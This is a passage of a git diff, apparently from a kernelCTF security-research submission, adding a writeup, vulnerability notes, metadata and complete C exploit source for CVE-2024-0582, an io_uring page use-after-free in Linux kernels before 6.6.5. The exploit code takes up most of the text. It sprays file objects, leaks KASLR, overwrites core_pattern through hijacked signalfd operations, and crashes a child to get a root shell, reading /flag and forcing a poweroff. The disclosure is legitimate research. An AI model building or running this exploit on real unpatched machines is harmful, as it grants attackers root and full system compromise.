{.bgid = i}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, + IORING_UNREGISTER_PBUF_RING, &unreg, 1)); + } +``` + +Spray enough `struct file` to reuse the UAF page from PCP list + +```c + char buf[1024] = {}; + for (int i = 0; i < SPRAY_FILE_NUM; i++) { + spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666)); + // later we can observe the write retval at victim_file->f_pos + SYSCHK(write(spray_fds[i], buf, i)); + } +``` + +Locate victim_file: + +```c + void *victim_file_addr = NULL; + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + if (victim_file_addr) + break; + for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) { + size_t shmem_file_operations = + *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP); + if ((shmem_file_operations & 0xfffff) == + (SHMEM_FILE_OPERATIONS & 0xfffff)) { + victim_file_addr = pbuf_mappings[i] + j; + logi("victim_file_addr %p", victim_file_addr); + break; + } + } + } +``` + +Get victim_file index and leak kaslr: + +```c + size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS); + size_t shmem_file_operations = + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP); + size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS; + size_t signalfd_fops = SIGNALFD_FOPS + kaslr; + size_t core_pattern = CORE_PATTERN + kaslr; + size_t private_data_before = + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA); +``` + +Abuse victim_file to get arbitrary write and overwrite the core_pattern: + +```c + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops; + char *fake = "|/proc/%P/fd/666 %P"; + for (int i = 0; i <= strlen(fake); i++) { // include the null byte + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i); + size_t mask = ~fake[i]; + SYSCHK(signalfd(spray_fds[victim_file_idx], (const sigset_t *)&mask, 0)); + } +``` + +This technique can be checked at [Mind the Gap - Project Zero: November 2022](https://googleprojectzero.blogspot.com/2022/11/#:~:text=struct%20was%20incremented.-,Overwriting%20the%20addr_limit,-Like%20many%20previous): + +```c +static int do_signalfd4(int ufd, sigset_t *mask, int flags) +{ + struct signalfd_ctx *ctx; + + /* Check the SFD_* constants for consistency. */ + BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC); + BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK); + + if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK)) + return -EINVAL; + + sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); + signotset(mask); + + if (ufd == -1) { + ctx = kmalloc(sizeof(*ctx), GFP_KERNEL); + if (!ctx) + return -ENOMEM; + + ctx->sigmask = *mask; + + /* + * When we call this, the initialization must be complete, since + * anon_inode_getfd() will install the fd. + */ + ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx, + O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK))); + if (ufd < 0) + kfree(ctx); + } else { + struct fd f = fdget(ufd); + if (!f.file) + return -EBADF; + ctx = f.file->private_data; // <-- get priv_data + if (f.file->f_op != &signalfd_fops) { + fdput(f); + return -EINVAL; + } + spin_lock_irq(¤t->sighand->siglock); + ctx->sigmask = *mask; // <-- write here + spin_unlock_irq(¤t->sighand->siglock); + + wake_up(¤t->sighand->signalfd_wqh); + fdput(f); + } + + return ufd; +} + +SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask, + size_t, sizemask, int, flags) +{ + sigset_t mask; + + if (sizemask != sizeof(sigset_t)) + return -EINVAL; + if (copy_from_user(&mask, user_mask, sizeof(mask))) + return -EFAULT; + return do_signalfd4(ufd, &mask, flags); +} +``` + +Then we trigger the core_pattern and execute program with root privilege: + +```c +// core_pattern exploit taken from +// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444 +int check_core() { + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from + * core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + + // trigger core_pattern exploit + if (fork() == 0) + crash(""); + while (1) + sleep(100); +``` + diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..8f13fa8b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md @@ -0,0 +1,33 @@ +# Vulneribility +A page-level use-after-free flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with `IORING_REGISTER_PBUF_RING`, mmap() it, and then frees it. + +## Requirements to trigger the vulnerability + - Capabilities: N / A + - Kernel configuration: `CONFIG_IO_URING` + - Are user namespaces needed?: N / A + +## Commit which introduced the vulnerability +[io_uring: add support for user mapped provided buffer ring](https://github.com/torvalds/linux/commit/c56e022c0a27142b7b59ae6bdf45f86bf4b298a1) + +## Commit which fixed the vulnerability + +[io_uring/kbuf: defer release of mapped buffer rings](https://github.com/torvalds/linux/commit/c392cbecd8eca4c53f2bf508731257d9d0a21c2d) + +## Affected kernel versions + +- before 6.6.5 + +## Affected component, subsystem +- io_uring + +## Cause +- UAF + +## Related syscalls + +- io_uring_setup +- io_uring_register + +## CVE URL + +[NVD - cve-2024-0582](https://nvd.nist.gov/vuln/detail/cve-2024-0582) \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 00000000..fc4f5ed7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,7 @@ +all: exploit + +exploit: exploit.c + gcc -o exploit exploit.c -static + +clean: + rm -rf exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit new file mode 100755 index 00000000..fd5511de Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 00000000..447baa0f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,254 @@ +#define _GNU_SOURCE +#include <assert.h> +#include <err.h> +#include <fcntl.h> +#include <linux/io_uring.h> +#include <pthread.h> +#include <sched.h> +#include <stdarg.h> +#include <stdint.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/mman.h> +#include <sys/resource.h> +#include <sys/sendfile.h> +#include <sys/signalfd.h> +#include <sys/socket.h> +#include <sys/syscall.h> +#include <sys/un.h> +#include <sys/wait.h> +#include <syscall.h> +#include <unistd.h> + +#define COLOR_GREEN "\033[32m" +#define COLOR_RED "\033[31m" +#define COLOR_YELLOW "\033[33m" +#define COLOR_DEFAULT "\033[0m" + +#define logd(fmt, ...) \ + dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) +#define logi(fmt, ...) \ + dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define logw(fmt, ...) \ + dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define loge(fmt, ...) \ + dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define die(fmt, ...) \ + do { \ + loge(fmt, ##__VA_ARGS__); \ + loge("Exit at line %d", __LINE__); \ + exit(1); \ + } while (0) + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#define SHMEM_FILE_OPERATIONS (0xffffffff82c44a40) +#define SIGNALFD_FOPS (0xffffffff82c4cc80) +#define CORE_PATTERN (0xffffffff83db3720) + +#define SPRAY_PBUF_NUM (0x10) +#define SPRAY_FILE_NUM (0x200) +int spray_fds[SPRAY_FILE_NUM]; +void *pbuf_mappings[SPRAY_PBUF_NUM]; + +#define PAGE_SZ (0x1000) + +#define OFFSET_FILE_FPOS (64) +#define OFFSET_FILE_FOP (176) +#define OFFSET_FILE_PRIV_DATA (200) +#define ALIGNED_FILE_SZ (256) + +// clang-format off +/* +struct file { + union { + struct llist_node f_llist; 0 8 + struct callback_head f_rcuhead __attribute__((__aligned__(8))); 0 16 + unsigned int f_iocb_flags; 0 4 + } __attribute__((__aligned__(8))); 0 16 + spinlock_t f_lock; 16 4 + fmode_t f_mode; 20 4 + atomic_long_t f_count; 24 8 + struct mutex f_pos_lock; 32 32 + --- cacheline 1 boundary (64 bytes) --- + loff_t f_pos; 64 8 + unsigned int f_flags; 72 4 + + XXX 4 bytes hole, try to pack + + struct fown_struct f_owner; 80 32 + const struct cred * f_cred; 112 8 + struct file_ra_state f_ra; 120 32 + --- cacheline 2 boundary (128 bytes) was 24 bytes ago --- + struct path f_path; 152 16 + struct inode * f_inode; 168 8 + const struct file_operations * f_op; 176 8 + u64 f_version; 184 8 + --- cacheline 3 boundary (192 bytes) --- + void * f_security; 192 8 + void * private_data; 200 8 + struct hlist_head * f_ep; 208 8 + struct address_space * f_mapping; 216 8 + errseq_t f_wb_err; 224 4 + errseq_t f_sb_err; 228 4 + + size: 232, cachelines: 4, members: 20 + sum members: 228, holes: 1, sum holes: 4 + forced alignments: 1 + last cacheline: 40 bytes +} __attribute__((__aligned__(8))); +*/ +// clang-format on + +static void pin_cpu(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) { + die("sched_setaffinity: %m"); + } +} + +// core_pattern exploit taken from +// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444 +int check_core() { + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) { + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from + * core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +int main(int argc, char **argv) { + if (argc > 1) { + // This section of code will be execute by root! + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR + * verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger;"); + execlp("bash", "bash", NULL); + exit(0); + } + setvbuf(stdout, 0, 2, 0); + + // pin cpu to a certain core to increase the exploit stability as later we + // need to play with PCP list + pin_cpu(0, getpid()); + + // setup io_uring + struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY}; + int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); + logi("uring_fd = %d", uring_fd); + + // spray pbuf and mmap buffer in order to create multiple single-page UAFs at + // the same time to increase the exploit stability + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg reg = { + .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, + ®, 1)); + + pbuf_mappings[i] = + SYSCHK(mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, + IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT))); + logi("[pbuf %d] mapped @ %p", i, pbuf_mappings[i]); + } + + // trigger page UAF + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + struct io_uring_buf_reg unreg = {.bgid = i}; + SYSCHK(syscall(__NR_io_uring_register, uring_fd, + IORING_UNREGISTER_PBUF_RING, &unreg, 1)); + } + + // spray enough `struct file` to reuse the UAF page from PCP list + char buf[1024] = {}; + for (int i = 0; i < SPRAY_FILE_NUM; i++) { + spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666)); + // later we can observe the write retval at victim_file->f_pos + SYSCHK(write(spray_fds[i], buf, i)); + } + + // locate victim_file + void *victim_file_addr = NULL; + for (int i = 0; i < SPRAY_PBUF_NUM; i++) { + if (victim_file_addr) + break; + for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) { + size_t shmem_file_operations = + *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP); + if ((shmem_file_operations & 0xfffff) == + (SHMEM_FILE_OPERATIONS & 0xfffff)) { + victim_file_addr = pbuf_mappings[i] + j; + logi("victim_file_addr %p", victim_file_addr); + break; + } + } + } + + // get victim_file index and leak kaslr + size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS); + size_t shmem_file_operations = + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP); + size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS; + size_t signalfd_fops = SIGNALFD_FOPS + kaslr; + size_t core_pattern = CORE_PATTERN + kaslr; + size_t private_data_before = + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA); + logi("victim_file_idx @ 0x%lx", victim_file_idx); + logi("shmem_file_operations @ 0x%lx", shmem_file_operations); + logi("private_data_before @ 0x%lx", private_data_before); + logi("kaslr @ 0x%lx", kaslr); + + // modify victim_file's fops to signalfd_fops + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops; + // fake victim_file's private_data to overwrite core_pattern + char *fake = "|/proc/%P/fd/666 %P"; + for (int i = 0; i <= strlen(fake); i++) { // include the null byte + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i); + size_t mask = ~fake[i]; + SYSCHK(signalfd(spray_fds[victim_file_idx], (const sigset_t *)&mask, 0)); + } + + // fix victim_file + *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = shmem_file_operations; + *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = private_data_before; + + // trigger core_pattern exploit + if (fork() == 0) + crash(""); + while (1) + sleep(100); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json new file mode 100644 index 00000000..4dc8e39b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json @@ -0,0 +1,32 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp211" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d", + "cve": "CVE-2024-0582", + "affected_versions": [ + "6.4 - 6.6.5" + ], + "requirements": { + "attack_surface": [ + "io_uring" + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_IO_URING" + ] + } + }, + "exploits": { + "mitigation-v4-6.6": { + "uses": [ + "io_uring" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "10 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz new file mode 100755 index 00000000..7d21e23c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz differ